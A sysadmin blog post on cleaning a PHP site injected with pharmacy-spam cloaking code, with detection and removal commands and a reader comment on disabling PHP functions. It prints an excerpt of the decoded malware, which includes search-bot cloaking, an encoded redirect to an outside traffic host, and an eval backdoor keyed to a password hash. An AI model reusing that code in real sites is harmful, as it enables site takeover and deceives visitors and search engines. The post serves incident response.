Site Hacked with Pharmacy Spammy Content on search listings

Got an email* today saying that searches are returning pharmacy spam URLs and content for this site. It took around three hours to find out what was happening and fix it. The site should finally be free of spam now. It may take a while for the Google index entries to update, but the redirect is no longer happening.

For the benefit of sysadmins who may face this issue, here are some details on how to deal with it.

Anatomy of a Site Hacked with Pharmacy Spammy Content on Search Listings

How it works, and how the Google listings are modified

Malicious code is inserted into one of your files, such as the functions.php file.
This code causes requests for pages on your website to be served from another server.
When Googlebot, msnbot, or other bots index the site, your content is hidden by the redirect and the pharmacy spam content is retrieved by the bot instead. This result is stored in the Google index, and you see those entries in Google search results.
(You can check what the Google, MSN, and Yahoo bots are getting from your web page — )

When you click the link in the search engine, you are redirected to the other site from within your own site, so the link stays the same while the content and its description change.
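You can reproduce this check yourself by fetching your page while pretending to be a search-engine bot, or while sending a search-engine referer, and comparing the result with a normal fetch. This is a sketch; `example.com` is a placeholder for your own domain, and the User-Agent strings are illustrative.

```shell
# Fetch the page as a normal browser would.
curl -s -A "Mozilla/5.0 Firefox/3.6.12" http://example.com/ > normal.html

# Fetch the same page pretending to be Googlebot; the cloaking code keys on
# "bot" in the User-Agent, so the spam version may be served here.
curl -s -A "Googlebot/2.1 (+http://www.google.com/bot.html)" \
  http://example.com/ > asbot.html

# Fetch with a Google referer, which triggers the redirect branch.
curl -s -L -e "http://www.google.com/search?q=test" \
  http://example.com/ > fromsearch.html

# Any difference between the three fetches is a red flag.
diff -q normal.html asbot.html
diff -q normal.html fromsearch.html
```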

Here are the steps to find and remove the malicious software from your site:

  • 1. The hacked code is generally inserted into a PHP or other file as a base64-encoded string, similar to the one below: eval(base64_decode(‘ZXJyb3I….OC44M — and so on for a few lines (an ~8 KB string in this example).
  • 2. Use find and grep to locate the eval and base64_decode strings inside the files. Many files will contain them for legitimate purposes, but the hacked file will have an encoded string hiding the program line. Use the following commands to find the code (note the escaped semicolon):

    find . -type f -exec grep -i eval {} \; | grep base64 — look for long strings of numbers and letters

    find . -type f -exec grep -li eval {} \; | xargs grep -li base64 — gives the names of the files

  • 3. From the above commands, pinpoint the hacked file. Do a `more` on the file to confirm that you have the correct one. Rename the file so that it is no longer used by any program.
  • 4. If you have a copy of the original file, copy it back into place. Otherwise you can do a `grep -v base64 hacked-file.php > good-file.php` to remove the encoded line, then rename the result to the original file name.
  • 5. If interested, you can copy and paste the string into a base64 decoder to see what the program was trying to do.
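The steps above can be sketched as a small shell session. The file names are hypothetical, and the base64 string in the decode example is a harmless stand-in, not the real payload.

```shell
# Step 2: list files that contain both "eval" and "base64" (note the escaped ';').
find . -type f -name '*.php' -exec grep -li eval {} \; | xargs -r grep -li base64

# Demo setup: create a stand-in "infected" file ("infected.php" is hypothetical).
printf '<?php\n// legitimate code\neval(base64_decode("AAAA"));\n' > infected.php

# Steps 3-4: keep a renamed copy for analysis, then strip the injected line.
cp infected.php infected.php.hacked
grep -v base64_decode infected.php.hacked > infected.php

# Step 5: decode a suspected payload locally to inspect it.
# 'ZWNobyAiaGkiOw==' is a harmless example string, not the real payload.
echo 'ZWNobyAiaGkiOw==' | base64 -d
```

Decoding locally with `base64 -d` avoids pasting attacker strings into a third-party website.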

For the curious who want to know what is happening, here is the code after base64 decoding (excerpted). This was added to one of the .php files as a base64-encoded string ~7 KB long, causing Google results to show spammy link descriptions.

———-code —
$bot_list = array("8.6.48", "62.172.199", … , "94.100.17");
$ip = preg_replace("/\.(\d+)$/", "", $_SERVER["REMOTE_ADDR"]);
$originalip = $_SERVER["REMOTE_ADDR"];
function read_content($getsite, $getpage, $typeread) {
if ($typeread == "seo") {
if ($typeread == "traffic") {
if (function_exists("curl_init")) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $sourceurl);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_TIMEOUT, 10);
$out = curl_exec($c);
$out = @file_get_contents($sourceurl);
if (!preg_match('/^http(s){0,1}:\/\/(.*?)\//', $sourceurl, $matches)) {
$out = "";
$domain = $matches[2];
$fp = fsockopen($domain, 80, $errno, $errstr, 30);
if (!$fp) { $out = ''; } else {
$crlf = "\r\n";
$req = "GET $sourceurl HTTP/1.0".$crlf;
$req .= 'Host: '.$domain.$crlf;
$req .= 'User-Agent: Mozilla/5.0 Firefox/3.6.12'.$crlf.$crlf;
fwrite($fp, $req);
$out = '';
while (!feof($fp)) {
$out .= fgets($fp, 256);
$out = substr($out, strpos($out, "\r\n\r\n")+4);
$out = "0";
return $out;
if (!array_key_exists('HTTP_USER_AGENT', $_SERVER))
if (md5($_POST["key"]) == "c8d4613f940c517da44c91e7223140f3") { $cmd = $_POST["code"]; eval(stripslashes($cmd)); exit; }
if (in_array($ip, $bot_list) || strpos($_SERVER['HTTP_USER_AGENT'], "bot")) {
if (substr($printpage, 0, 3) == "OK!") {
$printpage = substr($printpage, 3);
} else {
$printpage = "0";
if ($printpage != "0") {
echo $printpage; die;
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"]) && !preg_match("/^(000000000000)/", $originalip)) {
$seopage = read_content($_SERVER['HTTP_HOST'], $_SERVER['REQUEST_URI'], 'seo');
if (substr($seopage, 0, 4) == "SEO!") {
$getkeyword = substr($seopage, 4);
$urlsutra = base64_decode('aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMCZwYXJhbWV0ZXI9');
$urlsutra = $urlsutra.urlencode($getkeyword)."&seoref=".$_SERVER["HTTP_REFERER"]."&HTTP_REFERER=".$_SERVER['HTTP_HOST'];
header('Cache-Control: no-cache, no-store, must-revalidate');
$trafficpage = read_content($urlsutra, '', 'traffic');
echo $trafficpage; die;
} else {
header("location: ".$urlsutra); die;
——end code ——

* Thanks, Andy, for pointing out this issue.

One Response to Site Hacked with Pharmacy Spammy Content on search listings

  1. Amine says:

    It happened to a website I used to manage. They inject code that you don’t see when you browse the website; however, search engines see different content. I think they call it “black SEO”.

    If you have access to the server config files, you can try to disable PHP functions you don’t need. Many scripts used by ill-intentioned parties rely heavily on functions like system, passthru, etc., while most websites don’t need them. If you block these, then even if they manage to upload a script to the server and call it from a browser, it’s not going to work.
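    A minimal sketch of the hardening described above, using PHP’s `disable_functions` ini directive. The function list is illustrative, and the fragment is written to a local file here so it can be reviewed before being copied into the real php.ini or a conf.d directory (paths vary by distribution).

```shell
# Write an example hardening fragment locally for review.
cat > hardening.ini <<'EOF'
; Block functions commonly abused by uploaded webshells.
; Review this list against what your site actually uses before deploying.
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
EOF

cat hardening.ini
```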

Leave a Reply

Your email address will not be published. Required fields are marked *